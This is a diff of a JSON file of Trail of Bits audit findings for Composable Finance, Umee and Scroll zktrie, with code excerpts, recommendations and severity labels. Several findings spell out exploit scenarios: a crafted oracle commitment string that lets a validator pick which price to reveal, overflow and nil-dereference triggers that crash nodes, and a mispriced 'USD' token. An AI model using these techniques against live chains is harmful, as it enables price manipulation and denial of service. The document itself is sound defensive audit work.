implementation. Long term, ensure full test coverage in the chosen implementation; ensure the implementation has both positive and negative testing; and add fuzz testing to the proof verication routine.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "21. Unnecessary complexity due to interactions with native and smart contract tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The Composable Finance code is needlessly complex and has excessive branching. Its complexity largely results from the integration of both ERC20s and native tokens (i.e., ether). Creating separate functions that convert native tokens to ERC20s and then interact with functions that must receive ERC20 tokens (i.e., implementing separation of concerns) would drastically simplify and optimize the code. This complexity is the source of many bugs and increases the gas costs for all users whether or not they need to distinguish between ERC20s and ether. It is best practice to make components as small as possible and to separate helpful but noncritical components into periphery contracts. This reduces the attack surface and improves readability. Figure 21.1 shows an example of complex code. if (tempData.isSlp) { IERC20(sushiConfig.slpToken()).safeTransfer( msg.sender , tempData.slpAmount ); [...] } else { //unwrap and send the right asset [...] if (tempData.isEth) { [...] } else { IERC20(sushiConfig.wethToken()).safeTransfer( Figure 21.1: Part of the withdraw function in SushiSlpStrategy.sol:L180-L216 Recommendations Short term, remove the native ether interactions and use WETH instead. Long term, minimize the function complexity by breaking functions into smaller units. Additionally, refactor the code with minimalism in mind and extend the core functionality into periphery contracts.", + "title": "4. BuildZkTrieProof does not populate NodeAux.Value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2 where k != k2. In the zktrie codebase, that second case is handled by the NodeAux eld in the Proof struct, as illustrated in gure 4.1. // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf(\"non-existence proof being checked against hIndex equal to nodeAux\") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash elds to populate the Key and Value elds of NodeAux, as shown in gure 4.2. However, the valueHash eld of this node may be nil, causing NodeAux.Value to be nil and causing proof verication to crash with a nil pointer dereference error, which can be triggered by the test case shown in gure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run(\"Testing for non-inclusion proofs\", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in gure 4.4, xes this problem. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the highlighted n.NodeHash() call xes this problem. (zktrie/trie/zk_trie_impl.go#560574) Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service. Recommendations Short term, x BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verication, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report 5. Leaf nodes with di\u0000erent values may have the same hash Severity: High Diculty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-5 Target: trie/zk_trie_node.go, types/util.go", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "29. Use of legacy openssl version in CrosslayerPortal tests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CrosslayerPortal project uses a legacy version of openssl to run tests. While this version is not exposed in production, the use of outdated security protocols may be risky (gure 29.1). An unexpected error occurred: Error: error:0308010C:digital envelope routines::unsupported at new Hash (node:internal/crypto/hash:67:19) at Object.createHash (node:crypto:130:10) at hash160 (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:249:21 ) at HDKey.set (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:50:24) at Function.HDKey.fromMasterSeed (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:194:20 ) at deriveKeyFromMnemonicAndPath (~/CrosslayerPortal/node_modules/hardhat/src/internal/util/keys-derivation.ts:21:27) at derivePrivateKeys (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:29:52) at normalizeHardhatNetworkAccountsConfig (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:56:10) at createProvider (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/construction.ts:78:59) at ~/CrosslayerPortal/node_modules/hardhat/src/internal/core/runtime-environment.ts:80:28 { opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ], library: 'digital envelope routines', reason: 'unsupported', code: 'ERR_OSSL_EVP_UNSUPPORTED' } Figure 29.1: Errors agged in npx hardhat testing Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies. 22. Commented-out and unimplemented conditional statements Severity: Undetermined Diculty: Low Type: Undened Behavior Finding ID: TOB-CMP-22 Target: apyhunter-tricrypto/contracts/sushiswap/SushiSlpStrategy.sol", + "title": "6. Empty UpdatePreimage function body ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or a message that is logged. This would prevent the function from being used without any warning. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 6.1: zktrie/trie/zk_trie_database.go#19 Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "23. Error-prone NFT management in the Summoner contract ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The Summoner contracts ability to hold NFTs in a number of states may create confusion regarding the contracts states and the dierences between the contracts. For instance, the Summoner contract can hold the following kinds of NFTs: NFTs that have been pre-minted by Composable Finance and do not have metadata attached to them Original NFTs that have been locked by the Summoner for minting on the destination chain MosaicNFT wrapper tokens, which are copies of NFTs that have been locked and are intended to be minted on the destination chain As the system is scaled, the number of NFTs held by the Summoner , especially the number of pre-minted NFTs, will increase signicantly. Recommendations Simplify the NFT architecture; see the related recommendations in Appendix E .", + "title": "7. CanonicalValue is not canonical ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The CanonicalValue function does not uniquely generate a representation of Node structures, allowing dierent Nodes with the same CanonicalValue, and two nodes with the same NodeHash but dierent CanonicalValues. ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the rst 24 elds can be compressed, so CanonicalValue truncates CompressedFlags to the rst 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags eld of a Node. Figure 7.3 shows how this can be used to construct two dierent Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This gure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#5558) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString(\"0000000000000000000000000000000000000000000000000000000000000000\") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct dierent nodes with the same CanonicalValue // PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1< 4 || len (msg.Salt) < 1 { return sdkerrors.Wrap(ErrInvalidSaltLength, \"salt length must be [1, 4]\" ) } Figure 3.2: The salt-validation logic ( umee/x/oracle/types/msgs.go#148150 ) The second issue is the lack of proper salt validation, which would guarantee sucient domain separation between a random salt and the exchange rate when the commitment hash is calculated. The domain separator string consists of a colon character, as shown in gure 3.3. However, there is no verication of whether the salt is a hex-encoded string or whether it contains the separator character; only the length of the salt is validated. This bug could allow an attacker to reveal an exchange rate other than the one the attacker had committed to, violating the binding property of the scheme. func GetAggregateVoteHash(salt string , exchangeRatesStr string , voter sdk.ValAddress) AggregateVoteHash { hash := tmhash.NewTruncated() sourceStr := fmt.Sprintf( \"%s:%s:%s\" , salt, exchangeRatesStr, voter.String() ) Figure 3.3: The generation of a commitment hash ( umee/x/oracle/types/hash.go#2325 ) The last vulnerability in the scheme is the insucient validation of exchange rate strings: the strings undergo unnecessary trimming, and the code checks only that len(denomAmountStr) is less than two (gure 3.4), rather than performing a stricter check to conrm that it is not equal to two. This could allow an attacker to exploit the second bug described in this nding. func ParseExchangeRateTuples(tuplesStr string ) (ExchangeRateTuples, error ) { tuplesStr = strings.TrimSpace(tuplesStr) if len (tuplesStr) == 0 { return nil , nil } tupleStrs := strings.Split(tuplesStr, \",\" ) // (...) for i, tupleStr := range tupleStrs { denomAmountStr := strings.Split(tupleStr, \":\" ) if len (denomAmountStr) < 2 { return nil , fmt.Errorf( \"invalid exchange rate %s\" , tupleStr) } } // (...) } Figure 3.4: The code that parses exchange rates ( umee/x/oracle/types/vote.go#7286 ) Exploit Scenario The maximum salt length of two is increased. During a subsequent pre-voting period, a malicious validator submits the following commitment hash: sha256(\"whatever:UMEE:123:UMEE:456,USDC:789:addr\") . (Note that represents a normal whitespace character.) Then, during the voting period, the attacker waits for all other validators to reveal their exchange rates and salts and then chooses the UMEE price that he will reveal ( 123 or 456 ). In this way, the attacker can manipulate the exchange rate to his advantage. If the attacker chooses to reveal a price of 123 , the following will occur: 1. The salt will be set to whatever . 2. The attacker will submit an exchange rate string of UMEE:123:UMEE:456,USDC:789 . 3. The value will be hashed as sha256( whatever : UMEE:123:UMEE:456,USDC:789 : addr) . 4. The exchange rate will then be parsed as 123/789 (UMEE/USDC). Note that UMEE = 456 (with its leading whitespace character) will be ignored. This is because of the insucient validation of exchange rate strings (as described above) and the fact that only the rst and second items of denomAmountStr are used. (See the screenshot in Appendix D). If the attacker chooses to reveal a price of 456 , the following will occur: 1. The salt will be set to whatever:UMEE:123 . 2. The exchange rate string will be set to UMEE:456,USDC:789 . 3. The value will be hashed as sha256( whatever:UMEE:123 : UMEE:456,USDC:789 : addr) . 4. Because exchange rate strings undergo space trimming, the exchange rate will be parsed as 456/789 (UMEE/USDC). Recommendations Short term, take the following steps: Increase the salt length to prevent brute-force attacks. To ensure a security level of X bits, use salts of 2*X random bits. For example, for a 128-bit security level, use salts of 256 bits (32 bytes). Ensure domain separation by implementing validation of a salts format and accepting only hex-encoded strings. Implement stricter validation of exchange rates by ensuring that every exchange rate substring contains exactly one colon character and checking whether all denominations are included in the list of accepted denominations; also avoid trimming whitespaces at the beginning of the parsing process. Long term, consider replacing the truncated SHA-256 hash function with a SHA-512/256 or HMAC-SHA256 function. This will increase the level of security from 80 bits to about 128, which will help prevent collision and length extension attacks.", + "title": "11. The hash_external function panics with integers larger than 32 bytes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The hash_external function will cause a runtime error due to an out-of-bounds access if the input integers are larger than 32 bytes. func hash_external(inp []*big.Int) (*big.Int, error) { if len(inp) != 2 { return big.NewInt(0), errors.New(\"invalid input size\") } a := zkt.ReverseByteOrder(inp[0].Bytes()) b := zkt.ReverseByteOrder(inp[1].Bytes()) a = append(a, zeros[0:(32-len(a))]...) b = append(b, zeros[0:(32-len(b))]...) Figure 11.1: zktrie/lib.go#3139 Exploit Scenario An attacker causes the system to call hash_external with integers larger than 32 bytes, causing the system to experience a runtime error. Recommendations Short term, document the function requirements that the integers need to be less than 32 bytes. If the function is reachable by an adversary, add checks to ensure that the runtime error is not reachable. Long term, carefully check all indexing operations done on adversary-controlled values with respect to out-of-bounds accessing.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "4. Validators can crash other nodes by triggering an integer overow ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "By submitting a large exchange rate value, a validator can trigger an integer overow that will cause a Go panic and a node crash. The Umee oracle code checks that each exchange rate submitted by a validator is a positive value with a bit size of less than or equal to 256 (gures 4.1 and 4.2). The StandardDeviation method iterates over all exchange rates and adds up their squares (gure 4.3) but does not check for an overow. A large exchange rate value will cause the StandardDeviation method to panic when performing multiplication or addition . func ParseExchangeRateTuples(tuplesStr string ) (ExchangeRateTuples, error ) { // (...) for i, tupleStr := range tupleStrs { // (...) decCoin, err := sdk.NewDecFromStr(denomAmountStr[ 1 ]) // (...) if !decCoin.IsPositive() { return nil , types.ErrInvalidOraclePrice } Figure 4.1: The check of whether the exchange rate values are positive ( umee/x/oracle/types/vote.go#L71-L96 ) func (msg MsgAggregateExchangeRateVote) ValidateBasic() error { // (...) exchangeRates, err := ParseExchangeRateTuples(msg.ExchangeRates) if err != nil { /* (...) - returns wrapped error */ } for _, exchangeRate := range exchangeRates { // check overflow bit length if exchangeRate.ExchangeRate.BigInt().BitLen() > 255 +sdk.DecimalPrecisionBits // (...) - returns error Figure 4.2: The check of the exchange rate values bit lengths ( umee/x/oracle/types/msgs.go#L136-L146 ) sum := sdk.ZeroDec() for _, v := range pb { deviation := v.ExchangeRate.Sub(median) sum = sum.Add(deviation.Mul(deviation)) } Figure 4.3: Part of the StandardDeviation method ( umee/x/oracle/types/ballot.go#8387 ) The StandardDeviation method is called by the Tally function, which is called in the EndBlocker function. This means that an attacker could trigger an overow remotely in another validator node. Exploit Scenario A malicious validator commits to and then sends a large UMEE exchange rate value. As a result, all validator nodes crash, and the Umee blockchain network stops working. Recommendations Short term, implement overow checks for all arithmetic operations involving exchange rates. Long term, use fuzzing to ensure that no other parts of the code are vulnerable to overows.", + "title": "12. Mishandling of cgo.Handles causes runtime errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The interaction between the Rust and Go codebases relies on the use of cgo.Handles. These handles are a way to encode Go pointers between Go and, in this case, Rust. Handles can be passed back to the Go runtime, which will be able to retrieve the original Go value. According to the documentation, it is safe to represent an error with the zero value, as this is an invalid handle. However, the implementation should take this into account when retrieving the Go values from the handle, as both the Value and Delete methods for Handles panic on invalid handles. The codebase contains multiple instances of this behavior. For example, the NewTrieNode function will return 0 if it nds an error: // parse raw bytes and create the trie node //export NewTrieNode func NewTrieNode(data *C.char, sz C.int) C.uintptr_t { bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.NewNodeFromBytes(bt) if err != nil { return 0 } // calculate key for caching if _, err := n.NodeHash(); err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(n)) } Figure 12.1: zktrie/lib.go#7388 However, neither the Rust API nor the Go API takes these cases into consideration. Looking at the Rust API, the ZkTrieNode::parse function will simply save the result from NewTrieNode regardless of whether it is a valid or invalid Go handle. Then, calling any other function will cause a runtime error due to the use of an invalid handle. This issue is present in all functions implemented for ZkTrieNode: drop, node_hash, and value_hash. We now precisely describe how it fails in the drop function case. After constructing a malformed ZkTrieNode, the drop function will call FreeTrieNode on the invalid handle: impl Drop for ZkTrieNode { fn drop(&mut self) { unsafe { FreeTrieNode(self.trie_node) }; } } Figure 12.2: zktrie/src/lib.rs#127131 This will cause a panic given the direct use of the invalid handle on the Handle.Delete function: // free created trie node //export FreeTrieNode func FreeTrieNode(p C.uintptr_t) { freeObject(p) } func freeObject(p C.uintptr_t) { h := cgo.Handle(p) h.Delete() } Figure 12.3: zktrie/lib.go#114131 The following test triggers the described issue: #[test] fn invalid_handle_drop() { init_hash_scheme(hash_scheme); let _nd = ZkTrieNode::parse(&hex::decode(\"0001\").unwrap()); } // // panic: runtime/cgo: misuse of an invalid Handle running 1 test /opt/homebrew/Cellar/go/1.18.3/libexec/src/runtime/cgo/handle.go:137 // goroutine 17 [running, locked to thread]: // runtime/cgo.Handle.Delete(...) // // main.freeObject(0x14000060d01?) // // main.FreeTrieNode(...) // /zktrie/lib.go:130 +0x5c /zktrie/lib.go:116 Figure 12.4: A test case that triggers the nding in the drop case Exploit Scenario An attacker provides malformed data to ZkTrieNode::parse, causing it to contain an invalid Go handle. This subsequently causes the system to crash when one of the value_hash or node_hash functions is called or eventually when the node variable goes out of scope and the drop function is called. Recommendations Short term, ensure that invalid handles are not used with Delete or Value; for this, document the Go exported function requirements, and ensure that Rust checks for this before these functions are called. Long term, add tests that exercise all return paths for both the Go and Rust libraries.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "5. The repayValue variable is not used after being modied ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Keeper.LiquidateBorrow function uses the local variable repayValue to calculate the repayment.Amount value. If repayValue is greater than or equal to maxRepayValue , it is changed to that value. However, the repayValue variable is not used again after being modied, which suggests that the modication could be a bug or a code quality issue. func (k Keeper) LiquidateBorrow( // (...) // repayment cannot exceed borrowed value * close factor maxRepayValue := borrowValue.Mul(closeFactor) repayValue, err := k.TokenValue(ctx, repayment) if err != nil { return sdk.ZeroInt(), sdk.ZeroInt(), err } if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue).Quo( repayValue ).TruncateInt() repayValue = maxRepayValue } // (...) Figure 5.1: umee/x/leverage/keeper/keeper.go#L446-L456 We identied this issue by running CodeQL's DeadStoreOfLocal.ql query. Recommendations Short term, review and x the repayValue variable in the Keeper.LiquidateBorrow function, which is not used after being modied, to prevent related issues in the future.", + "title": "13. Unnecessary unsafe pointer manipulation in Node.Data() ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Node.Data() function returns the underlying value of a leaf node as a byte slice (i.e., []byte). Since the ValuePreimage eld is a slice of zkt.Byte32s, returning a value of type []byte requires some form of conversion. The implementation, shown in gure 13.1, uses the reflect and unsafe packages to manually construct a byte slice that overlaps with ValuePreimage. case NodeTypeLeaf: var data []byte hdata := (*reflect.SliceHeader)(unsafe.Pointer(&data)) //TODO: uintptr(reflect.ValueOf(n.ValuePreimage).UnsafePointer()) should be more elegant but only available until go 1.18 hdata.Data = uintptr(unsafe.Pointer(&n.ValuePreimage[0])) hdata.Len = 32 * len(n.ValuePreimage) hdata.Cap = hdata.Len return data Figure 13.1: Unsafe casting from []zkt.Byte32 to []byte (trie/zk_trie_node.go#174181) Manual construction of slices and unsafe casting between pointer types are error-prone and potentially very dangerous. This particular case appears to be harmless, but it is unnecessary and can be replaced by allocating a byte buer and copying ValuePreimage into it. Recommendations Short term, replace this unsafe cast with code that allocated a byte buer and then copies ValuePreimage, as described above. Long term, evaluate all uses of unsafe pointer manipulation and replace them with a safe alternative where possible.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "6. Inconsistent error checks in GetSigners methods ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The GetSigners methods in the x/oracle and x/leverage modules exhibit dierent error-handling behavior when parsing strings into validator or account addresses. The GetSigners methods in the x/oracle module always panic upon an error, while the methods in the x/leverage module explicitly ignore parsing errors. Figures 6.1 and 6.2 show examples of the GetSigners methods in those modules. We set the severity of this nding to informational because message addresses parsed in the x/leverage modules GetSigners methods are also validated in the ValidateBasic methods. As a result, the issue is not currently exploitable. // GetSigners implements sdk.Msg func (msg MsgDelegateFeedConsent) GetSigners() []sdk.AccAddress { operator, err := sdk.ValAddressFromBech32(msg.Operator) if err != nil { panic (err) } return []sdk.AccAddress{sdk.AccAddress(operator)} } Figure 6.1: umee/x/oracle/types/msgs.go#L174-L182 func (msg *MsgLendAsset) GetSigners() []sdk.AccAddress { lender, _ := sdk.AccAddressFromBech32(msg.GetLender()) return []sdk.AccAddress{lender} } Figure 6.2: umee/x/leverage/types/tx.go#L30-L33 Recommendations Short term, use a consistent error-handling process in the x/oracle and x/leverage modules GetSigners methods. The x/leverage module's GetSigners functions should handle errors in the same way that the x/oracle methods doby panicking.", + "title": "14. NewNodeFromBytes does not fully validate its input ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The NewNodeFromBytes function parses a byte array into a value of type Node. It checks several requirements for the Node value and returns nil and an error value if those checks fail. However, it allows a zero-length value for ValuePreimage (which allows TOB-ZKTRIE-10 to be exploited) and ignores extra data at the end of leaf and empty nodes. As shown in gure 14.1, the exact length of the byte array is checked in the case of a branch, but is unchecked for empty nodes and only lower-bounded in the case of a leaf node. case NodeTypeParent: if len(b) != 2*zkt.HashByteLen { return nil, ErrNodeBytesBadSize } n.ChildL = zkt.NewHashFromBytes(b[:zkt.HashByteLen]) n.ChildR = zkt.NewHashFromBytes(b[zkt.HashByteLen : zkt.HashByteLen*2]) case NodeTypeLeaf: if len(b) < zkt.HashByteLen+4 { return nil, ErrNodeBytesBadSize } n.NodeKey = zkt.NewHashFromBytes(b[0:zkt.HashByteLen]) mark := binary.LittleEndian.Uint32(b[zkt.HashByteLen : zkt.HashByteLen+4]) preimageLen := int(mark & 255) n.CompressedFlags = mark >> 8 n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78111) Recommendations Short term, add checks of the total byte array length and the preimageLen eld to NewNodeFromBytes. Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "7. Incorrect price assumption in the GetExchangeRateBase function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "If the denominator string passed to the GetExchangeRateBase function contains the substring USD (gure 7.1), the function returns 1 , presumably to indicate that the denominator is a stablecoin. If the system accepts an ERC20 token that is not a stablecoin but has a name containing USD, the system will report an incorrect exchange rate for the asset, which may enable token theft. Moreover, the price of an actual USD stablecoin may vary from USD 1. Therefore, if a stablecoin used as collateral for a loan loses its peg, the loan may not be liquidated correctly. // GetExchangeRateBase gets the consensus exchange rate of an asset // in the base denom (e.g. ATOM -> uatom) func (k Keeper) GetExchangeRateBase(ctx sdk.Context, denom string ) (sdk.Dec, error ) { if strings.Contains(strings.ToUpper(denom), types.USDDenom) { return sdk.OneDec(), nil } // (...) Figure 7.1: umee/x/oracle/keeper/keeper.go#L89-L94 func (k Keeper) TokenPrice(ctx sdk.Context, denom string ) (sdk.Dec, error ) { if !k.IsAcceptedToken(ctx, denom) { return sdk.ZeroDec(), sdkerrors.Wrap(types.ErrInvalidAsset, denom) } price, err := k.oracleKeeper.GetExchangeRateBase(ctx, denom) // (...) return price, nil } Figure 7.2: umee/x/leverage/keeper/oracle.go#L12-L34 Exploit Scenario Umee adds the cUSDC ERC20 token as an accepted token. Upon its addition, its price is USD 0.02, not USD 1. However, because of the incorrect price assumption, the system sets its price to USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Exploit Scenario 2 The price of a stablecoin drops signicantly. However, the x/leverage module fails to detect the change and reports the price as USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Recommendations Short term, remove the condition that causes the GetExchangeRateBase function to return a price of USD 1 for any asset whose name contains USD.", + "title": "15. init_hash_scheme is not thread-safe ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in gure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in gure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#6769 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#6571 InitHashScheme calls two other functions: rst, a C function called init_hash_scheme and second, a second Go function (this time, in the hash module) called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in gure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29 However, the C function init_hash_scheme, shown in gure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#1315 However, the only potential data race comes from multi-threaded initialization, which contradicts the usage recommendation in the README, shown in gure 15.5. We must init the crate with a poseidon hash scheme before any actions: zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#824 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the How Safe and Unsafe Interact section of the Rustonomicon.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "8. Oracle price-feeder is vulnerable to manipulation by a single malicious price feed ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The price-feeder component uses a volume-weighted average price (VWAP) formula to compute average prices from various third-party providers. The price it determines is then sent to the x/oracle module, which commits it 